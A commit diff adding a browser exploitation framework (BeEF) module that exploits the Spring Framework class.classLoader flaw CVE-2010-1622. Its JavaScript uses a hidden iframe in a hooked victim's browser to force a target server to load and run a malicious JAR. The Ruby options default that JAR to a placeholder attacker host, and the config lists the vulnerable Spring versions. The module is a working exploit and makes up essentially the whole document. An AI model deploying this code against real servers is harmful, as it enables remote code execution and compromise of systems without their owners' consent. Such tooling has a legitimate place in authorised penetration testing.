Added Spring Framework Malicious JAR module

Fixes issue #526

modules/exploits/spring_framework_malicious_jar/command.js

@@ -0,0 +1,32 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	jar_file        = "<%= @jar_file %>";
+	form_controller = "<%= @form_controller %>";
+
+    uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+	var spring_iframe = beef.dom.createInvisibleIframe();
+	spring_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(spring_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});

modules/exploits/spring_framework_malicious_jar/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        spring_framework_malicious_jar:
+            enable: true
+            category: "Exploits"
+            name: "Spring Framework Malicious Jar"
+            description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).<br/>Specify the URL for a form controller on the target and the URL for your malicious JAR file.<br/>For more information see: http://www.exploit-db.com/exploits/13918/<br/><br/>Versions Affected:<br/>3.0.0 to 3.0.2<br/>2.5.0 to 2.5.6.SEC01 (community releases)<br/>2.5.0 to 2.5.7 (subscription customers)"
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/spring_framework_malicious_jar/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Spring_framework_malicious_jar < BeEF::Core::Command
+
+  def self.options
+    return [
+        {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'},
+        {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end